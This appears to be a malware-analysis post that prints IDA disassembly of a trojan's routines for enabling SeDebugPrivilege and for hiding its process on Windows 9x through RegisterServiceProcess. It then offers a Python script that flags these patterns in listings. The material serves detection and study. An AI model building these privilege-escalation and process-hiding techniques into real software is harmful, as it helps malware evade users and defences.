
Trojan detection and removal

2013-5-30 12:01 | Submitted by: security

Privilege escalation. The trojan opens its own process token with TOKEN_ADJUST_PRIVILEGES (20h), looks up the LUID of SeDebugPrivilege and calls AdjustTokenPrivileges twice: first with Attributes = 0, then with Attributes = 2 (SE_PRIVILEGE_ENABLED). With SeDebugPrivilege enabled it can open other processes, including system processes, regardless of their ACLs.

Code:

seg001:00406394 AdjustPrivilege proc near
seg001:00406394
seg001:00406394                 push    ebx
seg001:00406395                 add     esp, 0FFFFFFD0h
seg001:00406398                 lea     eax, [esp+30h+TokenHandle]
seg001:0040639C                 push    eax             ; TokenHandle
seg001:0040639D                 push    20h             ; DesiredAccess
seg001:0040639F                 call    GetCurrentProcess
seg001:0040639F
seg001:004063A4                 push    eax             ; ProcessHandle
seg001:004063A5                 call    OpenProcessToken
seg001:004063A5
seg001:004063AA                 lea     eax, [esp+30h+Luid]
seg001:004063AE                 push    eax             ; lpLuid
seg001:004063AF                 push    offset Name     ; "SeDebugPrivilege"
seg001:004063B4                 push    0               ; lpSystemName
seg001:004063B6                 call    LookupPrivilegeValueA
seg001:004063B6
seg001:004063BB                 mov     eax, [esp+30h+Luid.LowPart]
seg001:004063BF                 mov     [esp+30h+NewState.Privileges.Luid.LowPart], eax
seg001:004063C3                 mov     eax, [esp+30h+Luid.HighPart]
seg001:004063C7                 mov     [esp+30h+NewState.Privileges.Luid.HighPart], eax
seg001:004063CB                 mov     [esp+30h+NewState.PrivilegeCount], 1
seg001:004063D3                 xor     ebx, ebx
seg001:004063D5                 mov     [esp+30h+NewState.Privileges.Attributes], ebx
seg001:004063D9                 push    esp             ; ReturnLength
seg001:004063DA                 lea     eax, [esp+34h+PreviousState]
seg001:004063DE                 push    eax             ; PreviousState
seg001:004063DF                 push    10h             ; BufferLength
seg001:004063E1                 lea     eax, [esp+3Ch+NewState]
seg001:004063E5                 push    eax             ; NewState
seg001:004063E6                 push    0               ; DisableAllPrivileges
seg001:004063E8                 mov     eax, [esp+44h+TokenHandle]
seg001:004063EC                 push    eax             ; TokenHandle
seg001:004063ED                 call    AdjustTokenPrivileges
seg001:004063ED
seg001:004063F2                 mov     eax, [esp+30h+Luid.LowPart]
seg001:004063F6                 mov     [esp+30h+PreviousState.Privileges.Luid.LowPart], eax
seg001:004063FA                 mov     eax, [esp+30h+Luid.HighPart]
seg001:004063FE                 mov     [esp+30h+PreviousState.Privileges.Luid.HighPart], eax
seg001:00406402                 mov     [esp+30h+PreviousState.PrivilegeCount], 1
seg001:0040640A                 or      ebx, 2
seg001:0040640D                 mov     [esp+30h+PreviousState.Privileges.Attributes], ebx
seg001:00406411                 push    esp             ; ReturnLength
seg001:00406412                 push    0               ; PreviousState
seg001:00406414                 mov     eax, [esp+38h+BufferLength]
seg001:00406418                 push    eax             ; BufferLength
seg001:00406419                 lea     eax, [esp+3Ch+PreviousState]
seg001:0040641D                 push    eax             ; NewState
seg001:0040641E                 push    0               ; DisableAllPrivileges
seg001:00406420                 mov     eax, [esp+44h+TokenHandle]
seg001:00406424                 push    eax             ; TokenHandle
seg001:00406425                 call    AdjustTokenPrivileges
seg001:00406425
seg001:0040642A                 add     esp, 30h
seg001:0040642D                 pop     ebx
seg001:0040642E                 retn
seg001:0040642E
seg001:0040642E AdjustPrivilege endp

Registering itself as a system service to try to hide the process on Windows 9x. The function fills an OSVERSIONINFOA structure (dwOSVersionInfoSize = 94h) and, if GetVersionExA succeeds, compares dwPlatformId (offset 10h of the structure, var_84 here) with 2 (VER_PLATFORM_WIN32_NT); on NT it does nothing. On 9x it loads kernel32.dll, resolves the undocumented RegisterServiceProcess export with GetProcAddress and calls it with (0, 1), that is, register the current process as a simple service, which removes it from the Ctrl+Alt+Del task list on those systems.

Code:

seg001:00406598 RegisterService proc near
seg001:00406598
seg001:00406598                 add     esp, 0FFFFFF6Ch
seg001:0040659E                 mov     [esp+94h+var_94], 94h
seg001:004065A5                 push    esp             ; lpVersionInformation
seg001:004065A6                 call    GetVersionExA
seg001:004065A6
seg001:004065AB                 cmp     eax, 1
seg001:004065AE                 sbb     eax, eax
seg001:004065B0                 inc     eax
seg001:004065B1                 cmp     al, 1
seg001:004065B3                 jnz     short loc_4065FE
seg001:004065B3
seg001:004065B5                 cmp     [esp+94h+var_84], 2
seg001:004065BA                 jz      short loc_4065FE
seg001:004065BA
seg001:004065BC                 push    offset s_Kernel32_dll ; "kernel32.dll"
seg001:004065C1                 call    LoadLibraryA
seg001:004065C1
seg001:004065C6                 mov     hModule, eax
seg001:004065CB                 cmp     hModule, 0
seg001:004065D2                 jz      short loc_4065FE
seg001:004065D2
seg001:004065D4                 push    offset s_Registerservi ; "RegisterServiceProcess"
seg001:004065D9                 mov     eax, hModule
seg001:004065DE                 push    eax             ; hModule
seg001:004065DF                 call    GetProcAddress
seg001:004065DF
seg001:004065E4                 mov     addr_RegisterServiceProcess, eax
seg001:004065E9                 push    1
seg001:004065EB                 push    0
seg001:004065ED                 call    addr_RegisterServiceProcess
seg001:004065F3                 mov     eax, hModule
seg001:004065F8                 push    eax             ; hLibModule
seg001:004065F9                 call    FreeLibrary_0   ; "kernel32.dll"
seg001:004065F9
seg001:004065FE loc_4065FE:
seg001:004065FE                 add     esp, 94h
seg001:00406604                 retn
seg001:00406604
seg001:00406604 RegisterService endp
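The two behaviours above (enabling SeDebugPrivilege on the process's own token, and resolving RegisterServiceProcess at run time for Win9x process hiding) are easy to spot by hand in two functions, but a triage script can do the same over a whole IDA listing. The following is an added example, not code from the original post or from the sample being analysed: it parses an IDA text listing function by function, records the Win32 calls and the string references IDA left as comments, and flags functions whose call order and strings match either behaviour. The embedded listing is a constructed, trimmed excerpt of the page's own disassembly; the signature names and the helper functions are this example's own.

```python
import re

# Constructed sample input: trimmed lines from the listing on this page.
SAMPLE_LISTING = """\
seg001:00406394 AdjustPrivilege proc near
seg001:0040639F                 call    GetCurrentProcess
seg001:004063A5                 call    OpenProcessToken
seg001:004063AF                 push    offset Name     ; "SeDebugPrivilege"
seg001:004063B6                 call    LookupPrivilegeValueA
seg001:004063ED                 call    AdjustTokenPrivileges
seg001:00406425                 call    AdjustTokenPrivileges
seg001:0040642E AdjustPrivilege endp
seg001:00406598 RegisterService proc near
seg001:004065A6                 call    GetVersionExA
seg001:004065BC                 push    offset s_Kernel32_dll ; "kernel32.dll"
seg001:004065C1                 call    LoadLibraryA
seg001:004065D4                 push    offset s_Registerservi ; "RegisterServiceProcess"
seg001:004065DF                 call    GetProcAddress
seg001:004065ED                 call    addr_RegisterServiceProcess
seg001:00406604 RegisterService endp
"""

# IDA listing syntax: "<seg>:<addr> <name> proc near", "... endp",
# "call <target>" and string references echoed as ; "..." comments.
PROC_RE = re.compile(r"^\S+:[0-9A-Fa-f]+\s+(\w+)\s+proc\s+near")
ENDP_RE = re.compile(r"^\S+:[0-9A-Fa-f]+\s+(\w+)\s+endp")
CALL_RE = re.compile(r"^\S+:[0-9A-Fa-f]+\s+call\s+(\w+)")
STR_RE = re.compile(r';\s*"([^"]*)"')

# Behaviour signatures (this example's own names): the calls must occur in
# this relative order inside one function, and every string must be
# referenced somewhere in that same function.
SIGNATURES = {
    "enables SeDebugPrivilege on own token": {
        "calls": ["OpenProcessToken", "LookupPrivilegeValue", "AdjustTokenPrivileges"],
        "strings": ["SeDebugPrivilege"],
    },
    "Win9x process hiding via RegisterServiceProcess": {
        "calls": ["GetVersionEx", "LoadLibrary", "GetProcAddress"],
        "strings": ["kernel32.dll", "RegisterServiceProcess"],
    },
}


def parse_listing(text):
    """Return {function_name: {"calls": [...], "strings": [...]}} in listing order."""
    funcs = {}
    current = None
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if m:
            current = m.group(1)
            funcs[current] = {"calls": [], "strings": []}
            continue
        if ENDP_RE.match(line):
            current = None
            continue
        if current is None:
            continue  # data or code outside a recognised function
        m = CALL_RE.match(line)
        if m:
            funcs[current]["calls"].append(m.group(1))
        m = STR_RE.search(line)
        if m:
            funcs[current]["strings"].append(m.group(1))
    return funcs


def _norm(api_name):
    """Drop a trailing A/W so LookupPrivilegeValueA and ...W match one signature."""
    return re.sub(r"(?<=[a-z])[AW]$", "", api_name)


def _in_order(needles, haystack):
    """True if every needle occurs in haystack, in the given relative order."""
    pos = 0
    for needle in needles:
        try:
            pos = haystack.index(needle, pos) + 1
        except ValueError:
            return False
    return True


def match_behaviours(funcs):
    """Return {function_name: [behaviour labels]} for functions hitting a signature."""
    hits = {}
    for name, info in funcs.items():
        calls = [_norm(c) for c in info["calls"]]
        labels = [
            label for label, sig in SIGNATURES.items()
            if _in_order(sig["calls"], calls)
            and all(s in info["strings"] for s in sig["strings"])
        ]
        if labels:
            hits[name] = labels
    return hits


if __name__ == "__main__":
    for fn, labels in match_behaviours(parse_listing(SAMPLE_LISTING)).items():
        print(f"{fn}: {', '.join(labels)}")
```

Treat a hit as a behaviour indicator to combine with others, not as a verdict: debuggers and administration tools enable SeDebugPrivilege in exactly this way, and the RegisterServiceProcess path is dead code on NT-based Windows. The matcher also depends on IDA having resolved the string operands into comments; a packed or obfuscated sample that builds "SeDebugPrivilege" at run time will not be caught by it.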
